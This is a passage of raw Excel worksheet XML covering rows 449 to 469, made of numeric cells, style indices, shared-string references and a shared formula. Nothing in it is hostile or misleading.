      <c r="R449" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S449" s="15"/>
      <c r="T449" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U449" s="5"/>
      <c r="V449" s="5"/>
      <c r="W449" s="47"/>
      <c r="X449" s="45"/>
      <c r="Y449" s="45"/>
      <c r="Z449" s="38" t="s">
        <v>2404</v>
      </c>
      <c r="AA449" s="39" t="s">
        <v>2405</v>
      </c>
      <c r="AB449" s="38" t="s">
        <v>2406</v>
      </c>
      <c r="AC449" s="40">
        <v>231970.0</v>
      </c>
      <c r="AD449" s="5"/>
      <c r="AE449" s="14"/>
      <c r="AF449" s="14"/>
    </row>
    <row r="450">
      <c r="A450" s="6">
        <f t="shared" si="1"/>
        <v>0.7964030066</v>
      </c>
      <c r="B450" s="29">
        <v>1.0</v>
      </c>
      <c r="C450" s="29">
        <v>79143.0</v>
      </c>
      <c r="D450" s="14"/>
      <c r="E450" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F450" s="14"/>
      <c r="G450" s="29">
        <v>11.0</v>
      </c>
      <c r="H450" s="29">
        <v>1620.0</v>
      </c>
      <c r="I450" s="29">
        <v>63656.0</v>
      </c>
      <c r="J450" s="15"/>
      <c r="K450" s="29">
        <v>63656.0</v>
      </c>
      <c r="L450" s="15"/>
      <c r="M450" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N450" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O450" s="29">
        <v>6.0</v>
      </c>
      <c r="P450" s="29">
        <v>0.0</v>
      </c>
      <c r="Q450" s="15"/>
      <c r="R450" s="15"/>
      <c r="S450" s="15"/>
      <c r="T450" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U450" s="5"/>
      <c r="V450" s="5"/>
      <c r="W450" s="47"/>
      <c r="X450" s="45"/>
      <c r="Y450" s="45"/>
      <c r="Z450" s="38" t="s">
        <v>2407</v>
      </c>
      <c r="AA450" s="39" t="s">
        <v>2408</v>
      </c>
      <c r="AB450" s="38" t="s">
        <v>2409</v>
      </c>
      <c r="AC450" s="40">
        <v>79118.0</v>
      </c>
      <c r="AD450" s="5"/>
      <c r="AE450" s="14"/>
      <c r="AF450" s="14"/>
    </row>
    <row r="451">
      <c r="A451" s="6">
        <f t="shared" si="1"/>
        <v>0.1241133916</v>
      </c>
      <c r="B451" s="29">
        <v>1.0</v>
      </c>
      <c r="C451" s="15"/>
      <c r="D451" s="14"/>
      <c r="E451" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F451" s="14"/>
      <c r="G451" s="29">
        <v>2.0</v>
      </c>
      <c r="H451" s="29">
        <v>343.0</v>
      </c>
      <c r="I451" s="29">
        <v>216025.0</v>
      </c>
      <c r="J451" s="15"/>
      <c r="K451" s="29">
        <v>6253.0</v>
      </c>
      <c r="L451" s="15"/>
      <c r="M451" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N451" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O451" s="29">
        <v>3.0</v>
      </c>
      <c r="P451" s="29">
        <v>3.0</v>
      </c>
      <c r="Q451" s="15"/>
      <c r="R451" s="15"/>
      <c r="S451" s="15"/>
      <c r="T451" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U451" s="5"/>
      <c r="V451" s="5"/>
      <c r="W451" s="47"/>
      <c r="X451" s="45"/>
      <c r="Y451" s="45"/>
      <c r="Z451" s="38" t="s">
        <v>2410</v>
      </c>
      <c r="AA451" s="39" t="s">
        <v>2411</v>
      </c>
      <c r="AB451" s="38" t="s">
        <v>2412</v>
      </c>
      <c r="AC451" s="40">
        <v>216575.0</v>
      </c>
      <c r="AD451" s="5"/>
      <c r="AE451" s="14"/>
      <c r="AF451" s="14"/>
    </row>
    <row r="452">
      <c r="A452" s="6">
        <f t="shared" si="1"/>
        <v>0.5111375198</v>
      </c>
      <c r="B452" s="29">
        <v>1.0</v>
      </c>
      <c r="C452" s="29">
        <v>232101.0</v>
      </c>
      <c r="D452" s="14"/>
      <c r="E452" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F452" s="14"/>
      <c r="G452" s="29">
        <v>0.0</v>
      </c>
      <c r="H452" s="29">
        <v>373.0</v>
      </c>
      <c r="I452" s="29">
        <v>223701.0</v>
      </c>
      <c r="J452" s="15"/>
      <c r="K452" s="29">
        <v>229505.0</v>
      </c>
      <c r="L452" s="15"/>
      <c r="M452" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N452" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O452" s="29">
        <v>1.0</v>
      </c>
      <c r="P452" s="29">
        <v>2.0</v>
      </c>
      <c r="Q452" s="15"/>
      <c r="R452" s="15"/>
      <c r="S452" s="15"/>
      <c r="T452" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U452" s="5"/>
      <c r="V452" s="5"/>
      <c r="W452" s="47"/>
      <c r="X452" s="45"/>
      <c r="Y452" s="45"/>
      <c r="Z452" s="38" t="s">
        <v>2413</v>
      </c>
      <c r="AA452" s="39" t="s">
        <v>2414</v>
      </c>
      <c r="AB452" s="38" t="s">
        <v>2415</v>
      </c>
      <c r="AC452" s="40">
        <v>232099.0</v>
      </c>
      <c r="AD452" s="5"/>
      <c r="AE452" s="14"/>
      <c r="AF452" s="14"/>
    </row>
    <row r="453">
      <c r="A453" s="6">
        <f t="shared" si="1"/>
        <v>0.9025871005</v>
      </c>
      <c r="B453" s="29">
        <v>1.0</v>
      </c>
      <c r="C453" s="14"/>
      <c r="D453" s="14"/>
      <c r="E453" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F453" s="14"/>
      <c r="G453" s="29">
        <v>0.0</v>
      </c>
      <c r="H453" s="29">
        <v>184.0</v>
      </c>
      <c r="I453" s="29">
        <v>4606.0</v>
      </c>
      <c r="J453" s="15"/>
      <c r="K453" s="29">
        <v>4606.0</v>
      </c>
      <c r="L453" s="15"/>
      <c r="M453" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N453" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O453" s="29">
        <v>1.0</v>
      </c>
      <c r="P453" s="29">
        <v>0.0</v>
      </c>
      <c r="Q453" s="15"/>
      <c r="R453" s="15"/>
      <c r="S453" s="15"/>
      <c r="T453" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U453" s="5"/>
      <c r="V453" s="5"/>
      <c r="W453" s="47"/>
      <c r="X453" s="45"/>
      <c r="Y453" s="45"/>
      <c r="Z453" s="38" t="s">
        <v>2416</v>
      </c>
      <c r="AA453" s="39" t="s">
        <v>2417</v>
      </c>
      <c r="AB453" s="38" t="s">
        <v>2418</v>
      </c>
      <c r="AC453" s="40">
        <v>67530.0</v>
      </c>
      <c r="AD453" s="5"/>
      <c r="AE453" s="14"/>
      <c r="AF453" s="14"/>
    </row>
    <row r="454">
      <c r="A454" s="6">
        <f t="shared" si="1"/>
        <v>0.5325193334</v>
      </c>
      <c r="B454" s="29">
        <v>1.0</v>
      </c>
      <c r="C454" s="15"/>
      <c r="D454" s="14"/>
      <c r="E454" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F454" s="14"/>
      <c r="G454" s="29">
        <v>2.0</v>
      </c>
      <c r="H454" s="29">
        <v>147.0</v>
      </c>
      <c r="I454" s="29">
        <v>180619.0</v>
      </c>
      <c r="J454" s="15"/>
      <c r="K454" s="15"/>
      <c r="L454" s="15"/>
      <c r="M454" s="14"/>
      <c r="N454" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O454" s="29">
        <v>2.0</v>
      </c>
      <c r="P454" s="29">
        <v>2.0</v>
      </c>
      <c r="Q454" s="15"/>
      <c r="R454" s="15"/>
      <c r="S454" s="15"/>
      <c r="T454" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U454" s="5"/>
      <c r="V454" s="5"/>
      <c r="W454" s="47"/>
      <c r="X454" s="45"/>
      <c r="Y454" s="45"/>
      <c r="Z454" s="38" t="s">
        <v>2419</v>
      </c>
      <c r="AA454" s="39" t="s">
        <v>2420</v>
      </c>
      <c r="AB454" s="38" t="s">
        <v>2421</v>
      </c>
      <c r="AC454" s="40">
        <v>188127.0</v>
      </c>
      <c r="AD454" s="5"/>
      <c r="AE454" s="14"/>
      <c r="AF454" s="14"/>
    </row>
    <row r="455">
      <c r="A455" s="6">
        <f t="shared" si="1"/>
        <v>0.01704888454</v>
      </c>
      <c r="B455" s="29">
        <v>1.0</v>
      </c>
      <c r="C455" s="14"/>
      <c r="D455" s="14"/>
      <c r="E455" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F455" s="14"/>
      <c r="G455" s="29">
        <v>1.0</v>
      </c>
      <c r="H455" s="29">
        <v>687.0</v>
      </c>
      <c r="I455" s="29">
        <v>252164.0</v>
      </c>
      <c r="J455" s="15"/>
      <c r="K455" s="29">
        <v>252164.0</v>
      </c>
      <c r="L455" s="15"/>
      <c r="M455" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N455" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O455" s="29">
        <v>2.0</v>
      </c>
      <c r="P455" s="29">
        <v>0.0</v>
      </c>
      <c r="Q455" s="15"/>
      <c r="R455" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S455" s="15"/>
      <c r="T455" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U455" s="5"/>
      <c r="V455" s="5"/>
      <c r="W455" s="47"/>
      <c r="X455" s="45"/>
      <c r="Y455" s="45"/>
      <c r="Z455" s="38" t="s">
        <v>2422</v>
      </c>
      <c r="AA455" s="39" t="s">
        <v>2423</v>
      </c>
      <c r="AB455" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC455" s="40">
        <v>245637.0</v>
      </c>
      <c r="AD455" s="5"/>
      <c r="AE455" s="14"/>
      <c r="AF455" s="14"/>
    </row>
    <row r="456">
      <c r="A456" s="6">
        <f t="shared" si="1"/>
        <v>0.2436643547</v>
      </c>
      <c r="B456" s="29">
        <v>1.0</v>
      </c>
      <c r="C456" s="29">
        <v>78631.0</v>
      </c>
      <c r="D456" s="14"/>
      <c r="E456" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F456" s="14"/>
      <c r="G456" s="29">
        <v>3.0</v>
      </c>
      <c r="H456" s="29">
        <v>1529.0</v>
      </c>
      <c r="I456" s="29">
        <v>64795.0</v>
      </c>
      <c r="J456" s="15"/>
      <c r="K456" s="29">
        <v>64795.0</v>
      </c>
      <c r="L456" s="15"/>
      <c r="M456" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N456" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O456" s="29">
        <v>2.0</v>
      </c>
      <c r="P456" s="29">
        <v>2.0</v>
      </c>
      <c r="Q456" s="15"/>
      <c r="R456" s="15"/>
      <c r="S456" s="15"/>
      <c r="T456" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U456" s="5"/>
      <c r="V456" s="5"/>
      <c r="W456" s="45"/>
      <c r="X456" s="45"/>
      <c r="Y456" s="45"/>
      <c r="Z456" s="38" t="s">
        <v>2424</v>
      </c>
      <c r="AA456" s="39" t="s">
        <v>2425</v>
      </c>
      <c r="AB456" s="38" t="s">
        <v>2426</v>
      </c>
      <c r="AC456" s="40">
        <v>78630.0</v>
      </c>
      <c r="AD456" s="5"/>
      <c r="AE456" s="14"/>
      <c r="AF456" s="14"/>
    </row>
    <row r="457">
      <c r="A457" s="6">
        <f t="shared" si="1"/>
        <v>0.5768587453</v>
      </c>
      <c r="B457" s="29">
        <v>1.0</v>
      </c>
      <c r="C457" s="29">
        <v>120907.0</v>
      </c>
      <c r="D457" s="14"/>
      <c r="E457" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F457" s="14"/>
      <c r="G457" s="29">
        <v>8.0</v>
      </c>
      <c r="H457" s="29">
        <v>290.0</v>
      </c>
      <c r="I457" s="29">
        <v>72459.0</v>
      </c>
      <c r="J457" s="15"/>
      <c r="K457" s="15"/>
      <c r="L457" s="15"/>
      <c r="M457" s="15"/>
      <c r="N457" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O457" s="29">
        <v>1.0</v>
      </c>
      <c r="P457" s="29">
        <v>4.0</v>
      </c>
      <c r="Q457" s="15"/>
      <c r="R457" s="15"/>
      <c r="S457" s="15"/>
      <c r="T457" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U457" s="5"/>
      <c r="V457" s="5"/>
      <c r="W457" s="47"/>
      <c r="X457" s="45"/>
      <c r="Y457" s="45"/>
      <c r="Z457" s="38" t="s">
        <v>2427</v>
      </c>
      <c r="AA457" s="39" t="s">
        <v>2428</v>
      </c>
      <c r="AB457" s="38" t="s">
        <v>2429</v>
      </c>
      <c r="AC457" s="40">
        <v>120741.0</v>
      </c>
      <c r="AD457" s="5"/>
      <c r="AE457" s="14"/>
      <c r="AF457" s="14"/>
    </row>
    <row r="458">
      <c r="A458" s="6">
        <f t="shared" si="1"/>
        <v>0.06149386487</v>
      </c>
      <c r="B458" s="29">
        <v>1.0</v>
      </c>
      <c r="C458" s="29">
        <v>176198.0</v>
      </c>
      <c r="D458" s="14"/>
      <c r="E458" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F458" s="14"/>
      <c r="G458" s="29">
        <v>22.0</v>
      </c>
      <c r="H458" s="29">
        <v>8438.0</v>
      </c>
      <c r="I458" s="29">
        <v>166998.0</v>
      </c>
      <c r="J458" s="15"/>
      <c r="K458" s="29">
        <v>149193.0</v>
      </c>
      <c r="L458" s="15"/>
      <c r="M458" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N458" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O458" s="29">
        <v>4.0</v>
      </c>
      <c r="P458" s="29">
        <v>10.0</v>
      </c>
      <c r="Q458" s="15"/>
      <c r="R458" s="15"/>
      <c r="S458" s="15"/>
      <c r="T458" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U458" s="5"/>
      <c r="V458" s="5"/>
      <c r="W458" s="47"/>
      <c r="X458" s="45"/>
      <c r="Y458" s="45"/>
      <c r="Z458" s="38" t="s">
        <v>2430</v>
      </c>
      <c r="AA458" s="39" t="s">
        <v>2431</v>
      </c>
      <c r="AB458" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC458" s="40">
        <v>176197.0</v>
      </c>
      <c r="AD458" s="5"/>
      <c r="AE458" s="14"/>
      <c r="AF458" s="14"/>
    </row>
    <row r="459">
      <c r="A459" s="6">
        <f t="shared" si="1"/>
        <v>0.5417335875</v>
      </c>
      <c r="B459" s="29">
        <v>1.0</v>
      </c>
      <c r="C459" s="29">
        <v>24667.0</v>
      </c>
      <c r="D459" s="14"/>
      <c r="E459" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F459" s="14"/>
      <c r="G459" s="29">
        <v>1.0</v>
      </c>
      <c r="H459" s="29">
        <v>255.0</v>
      </c>
      <c r="I459" s="29">
        <v>396.0</v>
      </c>
      <c r="J459" s="15"/>
      <c r="K459" s="15"/>
      <c r="L459" s="15"/>
      <c r="M459" s="14"/>
      <c r="N459" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O459" s="29">
        <v>3.0</v>
      </c>
      <c r="P459" s="29">
        <v>0.0</v>
      </c>
      <c r="Q459" s="15"/>
      <c r="R459" s="15"/>
      <c r="S459" s="15"/>
      <c r="T459" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U459" s="5"/>
      <c r="V459" s="5"/>
      <c r="W459" s="47"/>
      <c r="X459" s="45"/>
      <c r="Y459" s="45"/>
      <c r="Z459" s="38" t="s">
        <v>2432</v>
      </c>
      <c r="AA459" s="39" t="s">
        <v>2433</v>
      </c>
      <c r="AB459" s="38" t="s">
        <v>2434</v>
      </c>
      <c r="AC459" s="40">
        <v>24657.0</v>
      </c>
      <c r="AD459" s="5"/>
      <c r="AE459" s="14"/>
      <c r="AF459" s="14"/>
    </row>
    <row r="460">
      <c r="A460" s="6">
        <f t="shared" si="1"/>
        <v>0.7529040861</v>
      </c>
      <c r="B460" s="29">
        <v>1.0</v>
      </c>
      <c r="C460" s="15"/>
      <c r="D460" s="14"/>
      <c r="E460" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F460" s="14"/>
      <c r="G460" s="29">
        <v>2.0</v>
      </c>
      <c r="H460" s="29">
        <v>341.0</v>
      </c>
      <c r="I460" s="29">
        <v>120498.0</v>
      </c>
      <c r="J460" s="15"/>
      <c r="K460" s="29">
        <v>120498.0</v>
      </c>
      <c r="L460" s="15"/>
      <c r="M460" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N460" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O460" s="29">
        <v>0.0</v>
      </c>
      <c r="P460" s="29">
        <v>5.0</v>
      </c>
      <c r="Q460" s="29">
        <v>0.0</v>
      </c>
      <c r="R460" s="15"/>
      <c r="S460" s="15"/>
      <c r="T460" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U460" s="5"/>
      <c r="V460" s="5"/>
      <c r="W460" s="47"/>
      <c r="X460" s="45"/>
      <c r="Y460" s="45"/>
      <c r="Z460" s="38" t="s">
        <v>2435</v>
      </c>
      <c r="AA460" s="39" t="s">
        <v>2436</v>
      </c>
      <c r="AB460" s="38" t="s">
        <v>2437</v>
      </c>
      <c r="AC460" s="40">
        <v>232976.0</v>
      </c>
      <c r="AD460" s="5"/>
      <c r="AE460" s="14"/>
      <c r="AF460" s="14"/>
    </row>
    <row r="461">
      <c r="A461" s="6">
        <f t="shared" si="1"/>
        <v>0.1166194729</v>
      </c>
      <c r="B461" s="29">
        <v>1.0</v>
      </c>
      <c r="C461" s="15"/>
      <c r="D461" s="14"/>
      <c r="E461" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F461" s="14"/>
      <c r="G461" s="29">
        <v>1.0</v>
      </c>
      <c r="H461" s="29">
        <v>1248.0</v>
      </c>
      <c r="I461" s="29">
        <v>9604.0</v>
      </c>
      <c r="J461" s="15"/>
      <c r="K461" s="15"/>
      <c r="L461" s="15"/>
      <c r="M461" s="15"/>
      <c r="N461" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O461" s="29">
        <v>2.0</v>
      </c>
      <c r="P461" s="29">
        <v>0.0</v>
      </c>
      <c r="Q461" s="15"/>
      <c r="R461" s="15"/>
      <c r="S461" s="15"/>
      <c r="T461" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U461" s="5"/>
      <c r="V461" s="5"/>
      <c r="W461" s="45"/>
      <c r="X461" s="45"/>
      <c r="Y461" s="45"/>
      <c r="Z461" s="38" t="s">
        <v>2438</v>
      </c>
      <c r="AA461" s="39" t="s">
        <v>2439</v>
      </c>
      <c r="AB461" s="38" t="s">
        <v>2440</v>
      </c>
      <c r="AC461" s="40">
        <v>141571.0</v>
      </c>
      <c r="AD461" s="5"/>
      <c r="AE461" s="14"/>
      <c r="AF461" s="14"/>
    </row>
    <row r="462">
      <c r="A462" s="6">
        <f t="shared" si="1"/>
        <v>0.05645917132</v>
      </c>
      <c r="B462" s="29">
        <v>1.0</v>
      </c>
      <c r="C462" s="15"/>
      <c r="D462" s="14"/>
      <c r="E462" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F462" s="14"/>
      <c r="G462" s="29">
        <v>4.0</v>
      </c>
      <c r="H462" s="29">
        <v>1042.0</v>
      </c>
      <c r="I462" s="29">
        <v>5997.0</v>
      </c>
      <c r="J462" s="15"/>
      <c r="K462" s="29">
        <v>-1.0</v>
      </c>
      <c r="L462" s="15"/>
      <c r="M462" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N462" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O462" s="29">
        <v>1.0</v>
      </c>
      <c r="P462" s="29">
        <v>1.0</v>
      </c>
      <c r="Q462" s="15"/>
      <c r="R462" s="15"/>
      <c r="S462" s="15"/>
      <c r="T462" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U462" s="5"/>
      <c r="V462" s="5"/>
      <c r="W462" s="47"/>
      <c r="X462" s="45"/>
      <c r="Y462" s="45"/>
      <c r="Z462" s="38" t="s">
        <v>2441</v>
      </c>
      <c r="AA462" s="39" t="s">
        <v>2442</v>
      </c>
      <c r="AB462" s="38" t="s">
        <v>2443</v>
      </c>
      <c r="AC462" s="40">
        <v>139611.0</v>
      </c>
      <c r="AD462" s="5"/>
      <c r="AE462" s="14"/>
      <c r="AF462" s="14"/>
    </row>
    <row r="463">
      <c r="A463" s="6">
        <f t="shared" si="1"/>
        <v>0.7098850507</v>
      </c>
      <c r="B463" s="29">
        <v>1.0</v>
      </c>
      <c r="C463" s="29">
        <v>104448.0</v>
      </c>
      <c r="D463" s="14"/>
      <c r="E463" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F463" s="14"/>
      <c r="G463" s="29">
        <v>3.0</v>
      </c>
      <c r="H463" s="29">
        <v>245.0</v>
      </c>
      <c r="I463" s="29">
        <v>72327.0</v>
      </c>
      <c r="J463" s="15"/>
      <c r="K463" s="29">
        <v>72327.0</v>
      </c>
      <c r="L463" s="15"/>
      <c r="M463" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N463" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O463" s="29">
        <v>1.0</v>
      </c>
      <c r="P463" s="29">
        <v>1.0</v>
      </c>
      <c r="Q463" s="15"/>
      <c r="R463" s="15"/>
      <c r="S463" s="15"/>
      <c r="T463" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U463" s="5"/>
      <c r="V463" s="5"/>
      <c r="W463" s="47"/>
      <c r="X463" s="45"/>
      <c r="Y463" s="45"/>
      <c r="Z463" s="38" t="s">
        <v>2444</v>
      </c>
      <c r="AA463" s="39" t="s">
        <v>2445</v>
      </c>
      <c r="AB463" s="38" t="s">
        <v>2446</v>
      </c>
      <c r="AC463" s="40">
        <v>104446.0</v>
      </c>
      <c r="AD463" s="5"/>
      <c r="AE463" s="14"/>
      <c r="AF463" s="14"/>
    </row>
    <row r="464">
      <c r="A464" s="6">
        <f t="shared" si="1"/>
        <v>0.6486416208</v>
      </c>
      <c r="B464" s="29">
        <v>1.0</v>
      </c>
      <c r="C464" s="29">
        <v>240909.0</v>
      </c>
      <c r="D464" s="14"/>
      <c r="E464" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F464" s="14"/>
      <c r="G464" s="29">
        <v>1.0</v>
      </c>
      <c r="H464" s="29">
        <v>116.0</v>
      </c>
      <c r="I464" s="29">
        <v>86361.0</v>
      </c>
      <c r="J464" s="15"/>
      <c r="K464" s="29">
        <v>86361.0</v>
      </c>
      <c r="L464" s="15"/>
      <c r="M464" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N464" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O464" s="29">
        <v>1.0</v>
      </c>
      <c r="P464" s="29">
        <v>0.0</v>
      </c>
      <c r="Q464" s="15"/>
      <c r="R464" s="15"/>
      <c r="S464" s="15"/>
      <c r="T464" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U464" s="5"/>
      <c r="V464" s="5"/>
      <c r="W464" s="47"/>
      <c r="X464" s="45"/>
      <c r="Y464" s="45"/>
      <c r="Z464" s="38" t="s">
        <v>2447</v>
      </c>
      <c r="AA464" s="39" t="s">
        <v>2448</v>
      </c>
      <c r="AB464" s="38" t="s">
        <v>2449</v>
      </c>
      <c r="AC464" s="40">
        <v>240907.0</v>
      </c>
      <c r="AD464" s="5"/>
      <c r="AE464" s="14"/>
      <c r="AF464" s="14"/>
    </row>
    <row r="465">
      <c r="A465" s="6">
        <f t="shared" si="1"/>
        <v>0.9807876849</v>
      </c>
      <c r="B465" s="29">
        <v>1.0</v>
      </c>
      <c r="C465" s="29">
        <v>238066.0</v>
      </c>
      <c r="D465" s="14"/>
      <c r="E465" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F465" s="14"/>
      <c r="G465" s="29">
        <v>3.0</v>
      </c>
      <c r="H465" s="29">
        <v>608.0</v>
      </c>
      <c r="I465" s="29">
        <v>242338.0</v>
      </c>
      <c r="J465" s="15"/>
      <c r="K465" s="29">
        <v>242338.0</v>
      </c>
      <c r="L465" s="15"/>
      <c r="M465" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N465" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O465" s="29">
        <v>2.0</v>
      </c>
      <c r="P465" s="29">
        <v>7.0</v>
      </c>
      <c r="Q465" s="15"/>
      <c r="R465" s="15"/>
      <c r="S465" s="15"/>
      <c r="T465" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U465" s="5"/>
      <c r="V465" s="5"/>
      <c r="W465" s="47"/>
      <c r="X465" s="45"/>
      <c r="Y465" s="45"/>
      <c r="Z465" s="38" t="s">
        <v>2450</v>
      </c>
      <c r="AA465" s="39" t="s">
        <v>2451</v>
      </c>
      <c r="AB465" s="38" t="s">
        <v>2452</v>
      </c>
      <c r="AC465" s="40">
        <v>238056.0</v>
      </c>
      <c r="AD465" s="5"/>
      <c r="AE465" s="14"/>
      <c r="AF465" s="14"/>
    </row>
    <row r="466">
      <c r="A466" s="6">
        <f t="shared" si="1"/>
        <v>0.6157377456</v>
      </c>
      <c r="B466" s="29">
        <v>1.0</v>
      </c>
      <c r="C466" s="15"/>
      <c r="D466" s="14"/>
      <c r="E466" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F466" s="14"/>
      <c r="G466" s="29">
        <v>0.0</v>
      </c>
      <c r="H466" s="29">
        <v>147.0</v>
      </c>
      <c r="I466" s="29">
        <v>49146.0</v>
      </c>
      <c r="J466" s="15"/>
      <c r="K466" s="15"/>
      <c r="L466" s="15"/>
      <c r="M466" s="14"/>
      <c r="N466" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O466" s="29">
        <v>1.0</v>
      </c>
      <c r="P466" s="29">
        <v>1.0</v>
      </c>
      <c r="Q466" s="15"/>
      <c r="R466" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S466" s="15"/>
      <c r="T466" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U466" s="5"/>
      <c r="V466" s="5"/>
      <c r="W466" s="47"/>
      <c r="X466" s="45"/>
      <c r="Y466" s="45"/>
      <c r="Z466" s="38" t="s">
        <v>2453</v>
      </c>
      <c r="AA466" s="39" t="s">
        <v>2454</v>
      </c>
      <c r="AB466" s="38" t="s">
        <v>2455</v>
      </c>
      <c r="AC466" s="40">
        <v>60772.0</v>
      </c>
      <c r="AD466" s="5"/>
      <c r="AE466" s="14"/>
      <c r="AF466" s="14"/>
    </row>
    <row r="467">
      <c r="A467" s="6">
        <f t="shared" si="1"/>
        <v>0.748383587</v>
      </c>
      <c r="B467" s="29">
        <v>1.0</v>
      </c>
      <c r="C467" s="29">
        <v>42174.0</v>
      </c>
      <c r="D467" s="14"/>
      <c r="E467" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F467" s="14"/>
      <c r="G467" s="29">
        <v>3.0</v>
      </c>
      <c r="H467" s="29">
        <v>3917.0</v>
      </c>
      <c r="I467" s="29">
        <v>20931.0</v>
      </c>
      <c r="J467" s="15"/>
      <c r="K467" s="15"/>
      <c r="L467" s="15"/>
      <c r="M467" s="14"/>
      <c r="N467" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O467" s="29">
        <v>1.0</v>
      </c>
      <c r="P467" s="29">
        <v>2.0</v>
      </c>
      <c r="Q467" s="15"/>
      <c r="R467" s="15"/>
      <c r="S467" s="15"/>
      <c r="T467" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U467" s="5"/>
      <c r="V467" s="5"/>
      <c r="W467" s="47"/>
      <c r="X467" s="45"/>
      <c r="Y467" s="45"/>
      <c r="Z467" s="38" t="s">
        <v>2456</v>
      </c>
      <c r="AA467" s="39" t="s">
        <v>2457</v>
      </c>
      <c r="AB467" s="38" t="s">
        <v>2458</v>
      </c>
      <c r="AC467" s="40">
        <v>42168.0</v>
      </c>
      <c r="AD467" s="5"/>
      <c r="AE467" s="14"/>
      <c r="AF467" s="14"/>
    </row>
    <row r="468">
      <c r="A468" s="6">
        <f t="shared" si="1"/>
        <v>0.7677633701</v>
      </c>
      <c r="B468" s="29">
        <v>1.0</v>
      </c>
      <c r="C468" s="15"/>
      <c r="D468" s="14"/>
      <c r="E468" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F468" s="14"/>
      <c r="G468" s="29">
        <v>3.0</v>
      </c>
      <c r="H468" s="29">
        <v>1121.0</v>
      </c>
      <c r="I468" s="29">
        <v>18452.0</v>
      </c>
      <c r="J468" s="15"/>
      <c r="K468" s="29">
        <v>18452.0</v>
      </c>
      <c r="L468" s="15"/>
      <c r="M468" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N468" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O468" s="29">
        <v>2.0</v>
      </c>
      <c r="P468" s="29">
        <v>2.0</v>
      </c>
      <c r="Q468" s="15"/>
      <c r="R468" s="15"/>
      <c r="S468" s="15"/>
      <c r="T468" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U468" s="5"/>
      <c r="V468" s="5"/>
      <c r="W468" s="47"/>
      <c r="X468" s="45"/>
      <c r="Y468" s="45"/>
      <c r="Z468" s="38" t="s">
        <v>2459</v>
      </c>
      <c r="AA468" s="39" t="s">
        <v>2460</v>
      </c>
      <c r="AB468" s="38" t="s">
        <v>2461</v>
      </c>
      <c r="AC468" s="40">
        <v>38490.0</v>
      </c>
      <c r="AD468" s="5"/>
      <c r="AE468" s="14"/>
      <c r="AF468" s="14"/>
    </row>
    <row r="469">
      <c r="A469" s="6">
        <f t="shared" si="1"/>
        <v>0.7813105155</v>
      </c>
      <c r="B469" s="29">
        <v>1.0</v>
      </c>
      <c r="C469" s="14"/>
      <c r="D469" s="14"/>
      <c r="E469" s="36" t="s">
